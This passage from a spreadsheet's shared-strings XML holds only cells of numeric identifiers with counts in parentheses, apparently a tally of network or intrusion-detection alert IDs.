  </si>
  <si>
    <t>46533 (1)</t>
  </si>
  <si>
    <t>46533</t>
  </si>
  <si>
    <t>2100527 (69), 46533 (1)</t>
  </si>
  <si>
    <t>2100527, 46533</t>
  </si>
  <si>
    <t>16214, 16250</t>
  </si>
  <si>
    <t>2100527 (116122), 2002752 (1), 2002749 (1), 2001579 (1)</t>
  </si>
  <si>
    <t>2100527, 2002752, 2002749, 2001579</t>
  </si>
  <si>
    <t>2100527 (116122), 2002752 (1), 2002749 (1)</t>
  </si>
  <si>
    <t>12588</t>
  </si>
  <si>
    <t>15 (6), 12 (5)</t>
  </si>
  <si>
    <t>15 (6), 12 (5), 2002752 (2), 2002749 (2)</t>
  </si>
  <si>
    <t>15, 12, 2002752, 2002749</t>
  </si>
  <si>
    <t>4 (5), 8 (2)</t>
  </si>
  <si>
    <t>4, 8</t>
  </si>
  <si>
    <t>17677, 7929858</t>
  </si>
  <si>
    <t>18 (150), 12 (63)</t>
  </si>
  <si>
    <t>18 (150), 40063 (92), 12 (63)</t>
  </si>
  <si>
    <t>18, 40063, 12</t>
  </si>
  <si>
    <t>2002752 (4), 2002749 (4), 2012870 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2012870</t>
  </si>
  <si>
    <t>18 (150), 40063 (92), 12 (63), 2002752 (4), 2002749 (4), 2012870 (1)</t>
  </si>
  <si>
    <t>18, 40063, 12, 2002752, 2002749, 2012870</t>
  </si>
  <si>
    <t>40063 (92), 2012870 (1)</t>
  </si>
  <si>
    <t>40063, 2012870</t>
  </si>
  <si>
    <t>2002752 (4), 2002749 (4)</t>
  </si>
  <si>
    <t>12 (63), 2002752 (4), 2002749 (4)</t>
  </si>
  <si>
    <t>18 (150)</t>
  </si>
  <si>
    <t>54547</t>
  </si>
  <si>
    <t>40094</t>
  </si>
  <si>
    <t>15578 (4822), 20 (908), 50447 (279), 12 (256), 24379 (247)</t>
  </si>
  <si>
    <t>15578, 20, 50447, 12, 24379</t>
  </si>
  <si>
    <t>50447 (279), 24379 (247)</t>
  </si>
  <si>
    <t>50447, 24379</t>
  </si>
  <si>
    <t>15578 (4822), 20 (908), 12 (256)</t>
  </si>
  <si>
    <t>15578, 20, 12</t>
  </si>
  <si>
    <t>15578 (4822), 20 (908), 12 (256), 2002749 (7)</t>
  </si>
  <si>
    <t>15578, 20, 12, 2002749</t>
  </si>
  <si>
    <t>107347979</t>
  </si>
  <si>
    <t>17533</t>
  </si>
  <si>
    <t>14984, 32452, 9999</t>
  </si>
  <si>
    <t>40018</t>
  </si>
  <si>
    <t>50447 (26807), 20 (1590)</t>
  </si>
  <si>
    <t>50447, 20</t>
  </si>
  <si>
    <t>2002749 (5), 2018208 (5), 2002822 (1)</t>
  </si>
  <si>
    <t>2002749, 2018208, 2002822</t>
  </si>
  <si>
    <t>50447 (26807), 20 (1590), 2002749 (5), 2018208 (5), 2002822 (1)</t>
  </si>
  <si>
    <t>50447, 20, 2002749, 2018208, 2002822</t>
  </si>
  <si>
    <t>50447 (26807)</t>
  </si>
  <si>
    <t>20 (1590), 2002749 (5), 2018208 (5), 2002822 (1)</t>
  </si>
  <si>
    <t>20, 2002749, 2018208, 2002822</t>
  </si>
  <si>
    <t>50447 (340240), 22953 (310291), 20 (1677)</t>
  </si>
  <si>
    <t>50447, 22953, 20</t>
  </si>
  <si>
    <t>2002822 (20), 2002749 (3)</t>
  </si>
  <si>
    <t>2002822, 2002749</t>
  </si>
  <si>
    <t>50447 (340240), 22953 (310291), 20 (1677), 2002822 (20), 2002749 (3)</t>
  </si>
  <si>
    <t>50447, 22953, 20, 2002822, 2002749</t>
  </si>
  <si>
    <t>50447 (340240)</t>
  </si>
  <si>
    <t>22953 (310291), 20 (1677)</t>
  </si>
  <si>
    <t>22953, 20</t>
  </si>
  <si>
    <t>22953 (310291), 20 (1677), 2002822 (20), 2002749 (3)</t>
  </si>
  <si>
    <t>22953, 20, 2002822, 2002749</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 2006408 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2006408</t>
  </si>
  <si>
    <t>2006408 (1)</t>
  </si>
  <si>
    <t>2006408</t>
  </si>
  <si>
    <t>58463</t>
  </si>
  <si>
    <t>1394 (14), 12 (8), 1917 (4), 1 (3), 38043 (2), 3065 (1), 5 (1), 23858 (1)</t>
  </si>
  <si>
    <t>1394, 12, 1917, 1, 38043, 3065, 5, 23858</t>
  </si>
  <si>
    <t>1394 (14), 12 (8), 1917 (4), 1 (3), 2002752 (3), 2002749 (3), 2001117 (3), 38043 (2), 3065 (1), 5 (1), 23858 (1)</t>
  </si>
  <si>
    <t>1394, 12, 1917, 1, 2002752, 2002749, 2001117, 38043, 3065, 5, 23858</t>
  </si>
  <si>
    <t>1394 (14), 1917 (4), 3065 (1)</t>
  </si>
  <si>
    <t>1394, 1917, 3065</t>
  </si>
  <si>
    <t>1394 (14), 38043 (2), 23858 (1)</t>
  </si>
  <si>
    <t>1394, 38043, 23858</t>
  </si>
  <si>
    <t>1394 (14)</t>
  </si>
  <si>
    <t>12 (8), 5 (1), 1 (1)</t>
  </si>
  <si>
    <t>12, 5, 1</t>
  </si>
  <si>
    <t>12 (8), 3065 (1), 1 (1), 5 (1)</t>
  </si>
  <si>
    <t>12, 3065, 1, 5</t>
  </si>
  <si>
    <t>12 (8), 2002752 (3), 2002749 (3), 3065 (1), 1 (1), 5 (1)</t>
  </si>
  <si>
    <t>12, 2002752, 2002749, 3065, 1, 5</t>
  </si>
  <si>
    <t>3065 (1)</t>
  </si>
  <si>
    <t>3065</t>
  </si>
  <si>
    <t>12 (8), 5 (1), 1 (1), 3065 (1)</t>
  </si>
  <si>
    <t>12, 5, 1, 3065</t>
  </si>
  <si>
    <t>1 (2)</t>
  </si>
  <si>
    <t>1917 (4), 1 (2)</t>
  </si>
  <si>
    <t>1917, 1</t>
  </si>
  <si>
    <t>2001117 (3)</t>
  </si>
  <si>
    <t>2001117</t>
  </si>
  <si>
    <t>1917 (4), 2001117 (3), 1 (2)</t>
  </si>
  <si>
    <t>1917, 2001117, 1</t>
  </si>
  <si>
    <t>33 (8), 18 (8), 3 (8), 254 (5), 59597 (3), 15 (1)</t>
  </si>
  <si>
    <t>33, 18, 3, 254, 59597, 15</t>
  </si>
  <si>
    <t>2002749 (12), 2002752 (2), 2059172 (1), 2060161 (1), 2060162 (1)</t>
  </si>
  <si>
    <t>2002749, 2002752, 2059172, 2060161, 2060162</t>
  </si>
  <si>
    <t>2002749 (12), 33 (8), 18 (8), 3 (8), 254 (5), 59597 (3), 2002752 (2), 15 (1), 2059172 (1), 2060161 (1), 2060162 (1)</t>
  </si>
  <si>
    <t>2002749, 33, 18, 3, 254, 59597, 2002752, 15, 2059172, 2060161, 2060162</t>
  </si>
  <si>
    <t>59597 (3)</t>
  </si>
  <si>
    <t>59597</t>
  </si>
  <si>
    <t>15 (1)</t>
  </si>
  <si>
    <t>254 (5), 15 (1)</t>
  </si>
  <si>
    <t>254, 15</t>
  </si>
  <si>
    <t>2002749 (12), 2002752 (2)</t>
  </si>
  <si>
    <t>2002749 (12), 254 (5), 2002752 (2), 15 (1)</t>
  </si>
  <si>
    <t>2002749, 254, 2002752, 15</t>
  </si>
  <si>
    <t>33 (8), 18 (8), 3 (8)</t>
  </si>
  <si>
    <t>2059172 (1), 2060161 (1), 2060162 (1)</t>
  </si>
  <si>
    <t>2059172, 2060161, 2060162</t>
  </si>
  <si>
    <t>33 (8), 18 (8), 3 (8), 2059172 (1), 2060161 (1), 2060162 (1)</t>
  </si>
  <si>
    <t>33, 18, 3, 2059172, 2060161, 2060162</t>
  </si>
  <si>
    <t>56101</t>
  </si>
  <si>
    <t>5 (11), 12 (2), 7 (1)</t>
  </si>
  <si>
    <t>5, 12, 7</t>
  </si>
  <si>
    <t>2008118 (93), 2008120 (2), 2008119 (1), 2019240 (1), 2018959 (1)</t>
  </si>
  <si>
    <t>2008118, 2008120, 2008119, 2019240, 2018959</t>
  </si>
  <si>
    <t>50447 (1657), 5 (11), 23861 (8), 1394 (4), 1444 (2), 15306 (2), 24303 (2), 12 (2), 6696 (1), 6694 (1), 6693 (1), 6691 (1), 6690 (1), 6701 (1), 648 (1), 16642 (1), 7 (1), 46533 (1), 1325 (1)</t>
  </si>
  <si>
    <t>50447, 5, 23861, 1394, 1444, 15306, 24303, 12, 6696, 6694, 6693, 6691, 6690, 6701, 648, 16642, 7, 46533, 1325</t>
  </si>
  <si>
    <t>2006408 (3283), 2008118 (93), 2100527 (15), 2002752 (4), 2002749 (4), 2029425 (3), 2101444 (2), 2008120 (2), 2008119 (1), 2019240 (1), 2021076 (1), 2018959 (1)</t>
  </si>
  <si>
    <t>2006408, 2008118, 2100527, 2002752, 2002749, 2029425, 2101444, 2008120, 2008119, 2019240, 2021076, 2018959</t>
  </si>
  <si>
    <t>2006408 (3283), 50447 (1657), 2008118 (93), 2100527 (15), 5 (11), 23861 (8), 1394 (4), 2002752 (4), 2002749 (4), 2029425 (3), 1444 (2), 15306 (2), 24303 (2), 12 (2), 2101444 (2), 2008120 (2), 6696 (1), 6694 (1), 6693 (1), 6691 (1), 6690 (1), 6701 (1), 648 (1), 16642 (1), 7 (1), 46533 (1), 1325 (1), 2008119 (1), 2019240 (1), 2021076 (1), 2018959 (1)</t>
  </si>
  <si>
    <t>2006408, 50447, 2008118, 2100527, 5, 23861, 1394, 2002752, 2002749, 2029425, 1444, 15306, 24303, 12, 2101444, 2008120, 6696, 6694, 6693, 6691, 6690, 6701, 648, 16642, 7, 46533, 1325, 2008119, 2019240, 2021076, 2018959</t>
  </si>
  <si>
    <t>1394 (4), 1444 (2), 648 (1), 1325 (1)</t>
  </si>
  <si>
    <t>1394, 1444, 648, 1325</t>
  </si>
  <si>
    <t>50447 (1657), 23861 (8), 1394 (4), 15306 (2), 6696 (1), 6694 (1), 6693 (1), 6691 (1), 6690 (1), 6701 (1), 648 (1), 16642 (1), 46533 (1), 1325 (1)</t>
  </si>
  <si>
    <t>50447, 23861, 1394, 15306, 6696, 6694, 6693, 6691, 6690, 6701, 648, 16642, 46533, 1325</t>
  </si>
  <si>
    <t>2006408 (3283), 2008118 (93), 2029425 (3), 2008120 (2), 2008119 (1), 2019240 (1), 2018959 (1)</t>
  </si>
  <si>
    <t>2006408, 2008118, 2029425, 2008120, 2008119, 2019240, 2018959</t>
  </si>
  <si>
    <t>2006408 (3283), 50447 (1657), 2008118 (93), 23861 (8), 1394 (4), 2029425 (3), 15306 (2), 2008120 (2), 6696 (1), 6694 (1), 6693 (1), 6691 (1), 6690 (1), 6701 (1), 648 (1), 16642 (1), 46533 (1), 1325 (1), 2008119 (1), 2019240 (1), 2018959 (1)</t>
  </si>
  <si>
    <t>2006408, 50447, 2008118, 23861, 1394, 2029425, 15306, 2008120, 6696, 6694, 6693, 6691, 6690, 6701, 648, 16642, 46533, 1325, 2008119, 2019240, 2018959</t>
  </si>
  <si>
    <t>1394 (4), 648 (1), 1325 (1)</t>
  </si>
  <si>
    <t>1394, 648, 1325</t>
  </si>
  <si>
    <t>2008118 (93), 1394 (4), 2008120 (2), 2008119 (1), 2019240 (1), 2018959 (1), 648 (1), 1325 (1)</t>
  </si>
  <si>
    <t>2008118, 1394, 2008120, 2008119, 2019240, 2018959, 648, 1325</t>
  </si>
  <si>
    <t>5 (11), 1444 (2), 12 (2), 7 (1)</t>
  </si>
  <si>
    <t>5, 1444, 12, 7</t>
  </si>
  <si>
    <t>2100527 (15), 2002752 (4), 2002749 (4), 2101444 (2), 2021076 (1)</t>
  </si>
  <si>
    <t>2100527, 2002752, 2002749, 2101444, 2021076</t>
  </si>
  <si>
    <t>2100527 (15), 5 (11), 2002752 (4), 2002749 (4), 1444 (2), 12 (2), 2101444 (2), 7 (1), 2021076 (1)</t>
  </si>
  <si>
    <t>2100527, 5, 2002752, 2002749, 1444, 12, 2101444, 7, 2021076</t>
  </si>
  <si>
    <t>1444 (2)</t>
  </si>
  <si>
    <t>1444</t>
  </si>
  <si>
    <t>5 (11), 12 (2), 1444 (2), 7 (1)</t>
  </si>
  <si>
    <t>5, 12, 1444, 7</t>
  </si>
  <si>
    <t>24303 (2)</t>
  </si>
  <si>
    <t>24303</t>
  </si>
  <si>
    <t>18 (12), 3 (2), 12 (2)</t>
  </si>
  <si>
    <t>18, 3, 12</t>
  </si>
  <si>
    <t>2035480 (4), 2018959 (2), 2025644 (2)</t>
  </si>
  <si>
    <t>2035480, 2018959, 2025644</t>
  </si>
  <si>
    <t>18 (12), 15306 (4), 3 (2), 58160 (2), 12 (2), 53331 (1)</t>
  </si>
  <si>
    <t>18, 15306, 3, 58160, 12, 53331</t>
  </si>
  <si>
    <t>2035480 (4), 2009080 (3), 2025644 (3), 2002752 (2), 2002749 (2), 2018959 (2)</t>
  </si>
  <si>
    <t>2035480, 2009080, 2025644, 2002752, 2002749, 2018959</t>
  </si>
  <si>
    <t>18 (12), 15306 (4), 2035480 (4), 2009080 (3), 2025644 (3), 3 (2), 58160 (2), 12 (2), 2002752 (2), 2002749 (2), 2018959 (2), 53331 (1)</t>
  </si>
  <si>
    <t>18, 15306, 2035480, 2009080, 2025644, 3, 58160, 12, 2002752, 2002749, 2018959, 53331</t>
  </si>
  <si>
    <t>2018959 (2), 2025644 (2)</t>
  </si>
  <si>
    <t>15306 (4), 58160 (2), 53331 (1)</t>
  </si>
  <si>
    <t>15306, 58160, 53331</t>
  </si>
  <si>
    <t>2009080 (3), 2025644 (3), 2018959 (2)</t>
  </si>
  <si>
    <t>2009080, 2025644, 2018959</t>
  </si>
  <si>
    <t>15306 (4), 2009080 (3), 2025644 (3), 58160 (2), 2018959 (2), 53331 (1)</t>
  </si>
  <si>
    <t>15306, 2009080, 2025644, 58160, 2018959, 53331</t>
  </si>
  <si>
    <t>18 (12), 3 (2)</t>
  </si>
  <si>
    <t>2035480 (4)</t>
  </si>
  <si>
    <t>18 (12), 2035480 (4), 3 (2)</t>
  </si>
  <si>
    <t>43604</t>
  </si>
  <si>
    <t>46533 (2)</t>
  </si>
  <si>
    <t>2100527 (68), 2002752 (1), 2002749 (1)</t>
  </si>
  <si>
    <t>2100527 (68), 46533 (2), 2002752 (1), 2002749 (1)</t>
  </si>
  <si>
    <t>2100527, 46533, 2002752, 2002749</t>
  </si>
  <si>
    <t>12 (157), 18 (26), 3 (16)</t>
  </si>
  <si>
    <t>2001330 (17), 2027413 (1)</t>
  </si>
  <si>
    <t>2001330, 2027413</t>
  </si>
  <si>
    <t>12 (157), 18 (26), 1448 (17), 3 (16), 1917 (6), 15935 (1), 44486 (1), 44484 (1), 44488 (1), 44487 (1), 44485 (1)</t>
  </si>
  <si>
    <t>12, 18, 1448, 3, 1917, 15935, 44486, 44484, 44488, 44487, 44485</t>
  </si>
  <si>
    <t>2101447 (17), 2001329 (17), 2001330 (17), 2002752 (11), 2002749 (11), 2003020 (7), 2001117 (3), 2027413 (1), 2003012 (1), 2034857 (1), 2044666 (1), 2059098 (1), 2059099 (1), 2059101 (1), 2059109 (1), 2059102 (1), 2059100 (1)</t>
  </si>
  <si>
    <t>2101447, 2001329, 2001330, 2002752, 2002749, 2003020, 2001117, 2027413, 2003012, 2034857, 2044666, 2059098, 2059099, 2059101, 2059109, 2059102, 2059100</t>
  </si>
  <si>
    <t>12 (157), 18 (26), 1448 (17), 2101447 (17), 2001329 (17), 2001330 (17), 3 (16), 2002752 (11), 2002749 (11), 2003020 (7), 1917 (6), 2001117 (3), 15935 (1), 44486 (1), 44484 (1), 44488 (1), 44487 (1), 44485 (1), 2027413 (1), 2003012 (1), 2034857 (1), 2044666 (1), 2059098 (1), 2059099 (1), 2059101 (1), 2059109 (1), 2059102 (1), 2059100 (1)</t>
  </si>
  <si>
    <t>12, 18, 1448, 2101447, 2001329, 2001330, 3, 2002752, 2002749, 2003020, 1917, 2001117, 15935, 44486, 44484, 44488, 44487, 44485, 2027413, 2003012, 2034857, 2044666, 2059098, 2059099, 2059101, 2059109, 2059102, 2059100</t>
  </si>
  <si>
    <t>1448 (17), 1917 (6)</t>
  </si>
  <si>
    <t>1448, 1917</t>
  </si>
  <si>
    <t>15935 (1), 44486 (1), 44484 (1), 44488 (1), 44487 (1), 44485 (1)</t>
  </si>
  <si>
    <t>15935, 44486, 44484, 44488, 44487, 44485</t>
  </si>
  <si>
    <t>2034857 (1)</t>
  </si>
  <si>
    <t>2034857</t>
  </si>
  <si>
    <t>15935 (1), 44486 (1), 44484 (1), 44488 (1), 44487 (1), 44485 (1), 2034857 (1)</t>
  </si>
  <si>
    <t>15935, 44486, 44484, 44488, 44487, 44485, 2034857</t>
  </si>
  <si>
    <t>12 (157)</t>
  </si>
  <si>
    <t>2027413 (1)</t>
  </si>
  <si>
    <t>2027413</t>
  </si>
  <si>
    <t>12 (157), 2027413 (1)</t>
  </si>
  <si>
    <t>12, 2027413</t>
  </si>
  <si>
    <t>2002752 (11), 2002749 (11), 2003020 (7), 2027413 (1), 2003012 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2003020, 2027413, 2003012</t>
  </si>
  <si>
    <t>12 (157), 2002752 (11), 2002749 (11), 2003020 (7), 2027413 (1), 2003012 (1)</t>
  </si>
  <si>
    <t>12, 2002752, 2002749, 2003020, 2027413, 2003012</t>
  </si>
  <si>
    <t>18 (26), 3 (16)</t>
  </si>
  <si>
    <t>2001330 (17)</t>
  </si>
  <si>
    <t>18 (26), 2001330 (17), 3 (16)</t>
  </si>
  <si>
    <t>18, 2001330, 3</t>
  </si>
  <si>
    <t>18 (26), 1448 (17), 3 (16), 1917 (6)</t>
  </si>
  <si>
    <t>18, 1448, 3, 1917</t>
  </si>
  <si>
    <t>2101447 (17), 2001329 (17), 2001330 (17), 2001117 (3), 2044666 (1), 2059098 (1), 2059099 (1), 2059101 (1), 2059109 (1), 2059102 (1), 2059100 (1)</t>
  </si>
  <si>
    <t>2101447, 2001329, 2001330, 2001117, 2044666, 2059098, 2059099, 2059101, 2059109, 2059102, 2059100</t>
  </si>
  <si>
    <t>18 (26), 1448 (17), 2101447 (17), 2001329 (17), 2001330 (17), 3 (16), 1917 (6), 2001117 (3), 2044666 (1), 2059098 (1), 2059099 (1), 2059101 (1), 2059109 (1), 2059102 (1), 2059100 (1)</t>
  </si>
  <si>
    <t>18, 1448, 2101447, 2001329, 2001330, 3, 1917, 2001117, 2044666, 2059098, 2059099, 2059101, 2059109, 2059102, 2059100</t>
  </si>
  <si>
    <t>18 (26), 2001330 (17), 1448 (17), 3 (16), 1917 (6)</t>
  </si>
  <si>
    <t>18, 2001330, 1448, 3, 1917</t>
  </si>
  <si>
    <t>33020</t>
  </si>
  <si>
    <t>13249 (1)</t>
  </si>
  <si>
    <t>13249</t>
  </si>
  <si>
    <t>2002752 (2), 2002749 (2), 13249 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 13249</t>
  </si>
  <si>
    <t>20 (1169), 12 (25), 1292 (2), 47398 (1)</t>
  </si>
  <si>
    <t>20, 12, 1292, 47398</t>
  </si>
  <si>
    <t>2002749 (18), 2101292 (2)</t>
  </si>
  <si>
    <t>2002749, 2101292</t>
  </si>
  <si>
    <t>47398 (1)</t>
  </si>
  <si>
    <t>47398</t>
  </si>
  <si>
    <t>20 (1169), 12 (25), 2002749 (18), 1292 (2), 2101292 (2)</t>
  </si>
  <si>
    <t>20, 12, 2002749, 1292, 2101292</t>
  </si>
  <si>
    <t>29247</t>
  </si>
  <si>
    <t>54790</t>
  </si>
  <si>
    <t>32296</t>
  </si>
  <si>
    <t>12 (10), 1 (4)</t>
  </si>
  <si>
    <t>2043343 (12), 2044076 (12), 2021076 (2), 2016141 (1), 2018959 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>2043343, 2044076, 2021076, 2016141, 2018959, 2025644</t>
  </si>
  <si>
    <t>12 (10), 1 (4), 15935 (3), 15306 (2), 50447 (1), 23861 (1), 16313 (1), 1200 (1)</t>
  </si>
  <si>
    <t>12, 1, 15935, 15306, 50447, 23861, 16313, 1200</t>
  </si>
  <si>
    <t>2001117 (16), 2043343 (12), 2044076 (12), 2060512 (7), 2060507 (7), 2002752 (3), 2002749 (3), 2021076 (3), 2025644 (2), 2101200 (2), 2016141 (1), 2003595 (1), 2018959 (1), 2059172 (1)</t>
  </si>
  <si>
    <t>2001117, 2043343, 2044076, 2060512, 2060507, 2002752, 2002749, 2021076, 2025644, 2101200, 2016141, 2003595, 2018959, 2059172</t>
  </si>
  <si>
    <t>2001117 (16), 2043343 (12), 2044076 (12), 12 (10), 2060512 (7), 2060507 (7), 1 (4), 15935 (3), 2002752 (3), 2002749 (3), 2021076 (3), 15306 (2), 2025644 (2), 2101200 (2), 50447 (1), 23861 (1), 16313 (1), 1200 (1), 2016141 (1), 2003595 (1), 2018959 (1), 2059172 (1)</t>
  </si>
  <si>
    <t>2001117, 2043343, 2044076, 12, 2060512, 2060507, 1, 15935, 2002752, 2002749, 2021076, 15306, 2025644, 2101200, 50447, 23861, 16313, 1200, 2016141, 2003595, 2018959, 2059172</t>
  </si>
  <si>
    <t>2018959 (1), 2025644 (1)</t>
  </si>
  <si>
    <t>15935 (3), 15306 (2), 50447 (1), 23861 (1), 16313 (1)</t>
  </si>
  <si>
    <t>15935, 15306, 50447, 23861, 16313</t>
  </si>
  <si>
    <t>2025644 (2), 2003595 (1), 2018959 (1)</t>
  </si>
  <si>
    <t>2025644, 2003595, 2018959</t>
  </si>
  <si>
    <t>15935 (3), 15306 (2), 2025644 (2), 50447 (1), 23861 (1), 16313 (1), 2003595 (1), 2018959 (1)</t>
  </si>
  <si>
    <t>15935, 15306, 2025644, 50447, 23861, 16313, 2003595, 2018959</t>
  </si>
  <si>
    <t>12 (10), 1 (1)</t>
  </si>
  <si>
    <t>2021076 (2), 2016141 (1)</t>
  </si>
  <si>
    <t>12 (10), 2021076 (2), 1 (1), 2016141 (1)</t>
  </si>
  <si>
    <t>12, 2021076, 1, 2016141</t>
  </si>
  <si>
    <t>12 (10), 1 (1), 1200 (1)</t>
  </si>
  <si>
    <t>12, 1, 1200</t>
  </si>
  <si>
    <t>2002752 (3), 2002749 (3), 2021076 (3), 2101200 (2), 2016141 (1)</t>
  </si>
  <si>
    <t>2002752, 2002749, 2021076, 2101200, 2016141</t>
  </si>
  <si>
    <t>12 (10), 2002752 (3), 2002749 (3), 2021076 (3), 2101200 (2), 1 (1), 1200 (1), 2016141 (1)</t>
  </si>
  <si>
    <t>12, 2002752, 2002749, 2021076, 2101200, 1, 1200, 2016141</t>
  </si>
  <si>
    <t>12 (10), 2021076 (2), 1 (1), 2016141 (1), 1200 (1)</t>
  </si>
  <si>
    <t>12, 2021076, 1, 2016141, 1200</t>
  </si>
  <si>
    <t>1 (3)</t>
  </si>
  <si>
    <t>2043343 (12), 2044076 (12)</t>
  </si>
  <si>
    <t>2043343, 2044076</t>
  </si>
  <si>
    <t>2043343 (12), 2044076 (12), 1 (3)</t>
  </si>
  <si>
    <t>2043343, 2044076, 1</t>
  </si>
  <si>
    <t>2001117 (16), 2043343 (12), 2044076 (12), 2060512 (7), 2060507 (7), 2059172 (1)</t>
  </si>
  <si>
    <t>2001117, 2043343, 2044076, 2060512, 2060507, 2059172</t>
  </si>
  <si>
    <t>2001117 (16), 2043343 (12), 2044076 (12), 2060512 (7), 2060507 (7), 1 (3), 2059172 (1)</t>
  </si>
  <si>
    <t>2001117, 2043343, 2044076, 2060512, 2060507, 1, 2059172</t>
  </si>
  <si>
    <t>86533</t>
  </si>
  <si>
    <t>59597 (2), 33 (2), 18 (2), 3 (1)</t>
  </si>
  <si>
    <t>59597, 33, 18, 3</t>
  </si>
  <si>
    <t>2002749 (10), 2002752 (1), 2059172 (1)</t>
  </si>
  <si>
    <t>2002749, 2002752, 2059172</t>
  </si>
  <si>
    <t>2002749 (10), 59597 (2), 33 (2), 18 (2), 3 (1), 2002752 (1), 2059172 (1)</t>
  </si>
  <si>
    <t>2002749, 59597, 33, 18, 3, 2002752, 2059172</t>
  </si>
  <si>
    <t>59597 (2)</t>
  </si>
  <si>
    <t>2002749 (10), 2002752 (1)</t>
  </si>
  <si>
    <t>2059172 (1)</t>
  </si>
  <si>
    <t>2059172</t>
  </si>
  <si>
    <t>33 (2), 18 (2), 3 (1), 2059172 (1)</t>
  </si>
  <si>
    <t>33, 18, 3, 2059172</t>
  </si>
  <si>
    <t>57756 (123), 15935 (123), 366 (5), 29456 (5), 384 (5), 408 (5), 20 (1)</t>
  </si>
  <si>
    <t>57756, 15935, 366, 29456, 384, 408, 20</t>
  </si>
  <si>
    <t>2100366 (5), 2100384 (5), 2100408 (5), 2002752 (4), 2002749 (4)</t>
  </si>
  <si>
    <t>2100366, 2100384, 2100408, 2002752, 2002749</t>
  </si>
  <si>
    <t>57756 (123), 15935 (123), 366 (5), 29456 (5), 384 (5), 408 (5), 2100366 (5), 2100384 (5), 2100408 (5), 2002752 (4), 2002749 (4), 20 (1)</t>
  </si>
  <si>
    <t>57756, 15935, 366, 29456, 384, 408, 2100366, 2100384, 2100408, 2002752, 2002749, 20</t>
  </si>
  <si>
    <t>57756 (123), 15935 (123)</t>
  </si>
  <si>
    <t>57756, 15935</t>
  </si>
  <si>
    <t>29456 (5), 20 (1)</t>
  </si>
  <si>
    <t>29456, 20</t>
  </si>
  <si>
    <t>29456 (5), 2002752 (4), 2002749 (4), 20 (1)</t>
  </si>
  <si>
    <t>29456, 2002752, 2002749, 20</t>
  </si>
  <si>
    <t>29456 (5)</t>
  </si>
  <si>
    <t>366 (5), 384 (5), 408 (5)</t>
  </si>
  <si>
    <t>366, 384, 408</t>
  </si>
  <si>
    <t>2100366 (5), 2100384 (5), 2100408 (5)</t>
  </si>
  <si>
    <t>2100366, 2100384, 2100408</t>
  </si>
  <si>
    <t>366 (5), 384 (5), 408 (5), 2100366 (5), 2100384 (5), 2100408 (5)</t>
  </si>
  <si>
    <t>366, 384, 408, 2100366, 2100384, 2100408</t>
  </si>
  <si>
    <t>2100366 (5), 366 (5), 384 (5), 408 (5)</t>
  </si>
  <si>
    <t>2100366, 366, 384, 408</t>
  </si>
  <si>
    <t>90232</t>
  </si>
  <si>
    <t>2010781 (10), 2025701 (2), 2025699 (1), 2027237 (1)</t>
  </si>
  <si>
    <t>2010781, 2025701, 2025699, 2027237</t>
  </si>
  <si>
    <t>12 (13), 30281 (6), 459 (1), 402 (1), 44489 (1), 26385 (1)</t>
  </si>
  <si>
    <t>12, 30281, 459, 402, 44489, 26385</t>
  </si>
  <si>
    <t>2010781 (10), 2002752 (2), 2002749 (2), 2025701 (2), 2101620 (1), 2100459 (1), 2100402 (1), 2044666 (1), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1), 2059126 (1), 2051116 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059104 (1), 2027191 (1), 2059107 (1), 2025699 (1), 2059114 (1), 2027237 (1), 2059116 (1), 2024510 (1), 2059106 (1), 2059115 (1)</t>
  </si>
  <si>
    <t>2010781, 2002752, 2002749, 2025701, 2101620, 2100459, 2100402, 2044666, 2059098, 2067085, 2059099, 2067086, 2067087, 2059126, 2051116, 2059101, 2059109, 2059103, 2059104, 2027191, 2059107, 2025699, 2059114, 2027237, 2059116, 2024510, 2059106, 2059115</t>
  </si>
  <si>
    <t>12 (13), 2010781 (10), 30281 (6), 2002752 (2), 2002749 (2), 2025701 (2), 459 (1), 402 (1), 44489 (1), 26385 (1), 2101620 (1), 2100459 (1), 2100402 (1), 2044666 (1), 2059098 (1), 2067085 (1), 2059099 (1), 2067086 (1), 2067087 (1), 2059126 (1), 2051116 (1), 2059101 (1), 2059109 (1), 2059103 (1), 2059104 (1), 2027191 (1), 2059107 (1), 2025699 (1), 2059114 (1), 2027237 (1), 2059116 (1), 2024510 (1), 2059106 (1), 2059115 (1)</t>
  </si>
  <si>
    <t>12, 2010781, 30281, 2002752, 2002749, 2025701, 459, 402, 44489, 26385, 2101620, 2100459, 2100402, 2044666, 2059098, 2067085, 2059099, 2067086, 2067087, 2059126, 2051116, 2059101, 2059109, 2059103, 2059104, 2027191, 2059107, 2025699, 2059114, 2027237, 2059116, 2024510, 2059106, 2059115</t>
  </si>
  <si>
    <t>2027237 (1)</t>
  </si>
  <si>
    <t>2027237</t>
  </si>
  <si>
    <t>30281 (6), 44489 (1), 26385 (1)</t>
  </si>
  <si>
    <t>30281, 44489, 26385</t>
  </si>
  <si>
    <t>2027237 (1), 2024510 (1)</t>
  </si>
  <si>
    <t>2027237, 2024510</t>
  </si>
  <si>
    <t>30281 (6), 44489 (1), 26385 (1), 2027237 (1), 2024510 (1)</t>
  </si>
  <si>
    <t>30281, 44489, 26385, 2027237, 2024510</t>
  </si>
  <si>
    <t>2010781 (10), 2025701 (2), 2025699 (1)</t>
  </si>
  <si>
    <t>2010781, 2025701, 2025699</t>
  </si>
  <si>
    <t>12 (13), 2010781 (10), 2025701 (2), 2025699 (1)</t>
  </si>
  <si>
    <t>12, 2010781, 2025701, 2025699</t>
  </si>
  <si>
    <t>2010781 (10), 2002752 (2), 2002749 (2), 2025701 (2), 2101620 (1), 2027191 (1), 2025699 (1)</t>
  </si>
  <si>
    <t>2010781, 2002752, 2002749, 2025701, 2101620, 2027191, 2025699</t>
  </si>
  <si>
    <t>12 (13), 2010781 (10), 2002752 (2), 2002749 (2), 2025701 (2), 2101620 (1), 2027191 (1), 2025699 (1)</t>
  </si>
  <si>
    <t>12, 2010781, 2002752, 2002749, 2025701, 2101620, 2027191, 2025699</t>
  </si>
  <si>
